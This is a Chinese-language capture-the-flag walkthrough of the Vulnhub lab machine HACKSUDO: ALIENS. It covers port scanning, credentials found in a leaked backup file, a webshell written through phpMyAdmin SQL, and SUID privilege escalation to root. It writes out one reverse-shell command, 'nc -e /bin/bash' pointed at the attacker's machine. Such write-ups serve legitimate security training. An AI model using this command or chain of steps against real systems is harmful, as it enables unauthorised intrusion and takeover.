Vulnhub 靶场 HACKSUDO: ALIENS

前期准备:

靶机地址:https://www.vulnhub.com/entry/hacksudo-aliens,676/

kali攻击机ip:192.168.11.128
靶机ip:192.168.11.145

一、信息收集

1.使用nmap对目标靶机进行扫描

image

开了 22、80、9000端口。

2. 80端口

image

是一些关于目击外星人的数据,查看源码也没发现什么,扫一下目录:

image

发现个游戏:

image

不用怎么动就能通关,不过通关了也没发现什么,看一下 /backup 目录:

image

发现个 mysql.bak 文件,下载下来查看:

image

发现了数据库的用户名和密码:

user="vishal"
password="hacksudo"

3. 9000端口

image

nmap扫的时候发现有 robots.txt 文件:

image

什么也没有,用上面的用户名密码直接登录phpmyadmin:

image

二、漏洞利用

查看可用的信息:

image

有用户和密码的hash值,不过用不了,那就利用sql语句写入一句话木马:

image

image

GO 执行后访问:

image

一句话木马写入成功,然后获取反弹 shell,查看是否有 nc:

image

利用 nc 反弹 shell并本地监听:

nc -e /bin/bash 192.168.11.128 1234

image

image

nc 连接成功,升级一下 shell

三、提权

查看文件没发现什么,查看权限和SUID文件:

image

发现可以用 date,date 可以越权查看文件:

image

image

得到了 root 和 hacksudo 的密码 hash,复制下来用 john 暴破一下:

image

root的密码短时间没有爆出来,hacksudo的密码一下就出来了:aliens,那就 ssh 登录:

image

查看权限和 SUID 文件:

image

有个二进制文件比较可疑。查看一下:

image

在 gtfobins 上找到了它的提权方式:

image

提权到 root:

image

查看 flag:

image

完成。

posted @ 2022-04-15 11:27  sainet  阅读(189)  评论(0编辑  收藏  举报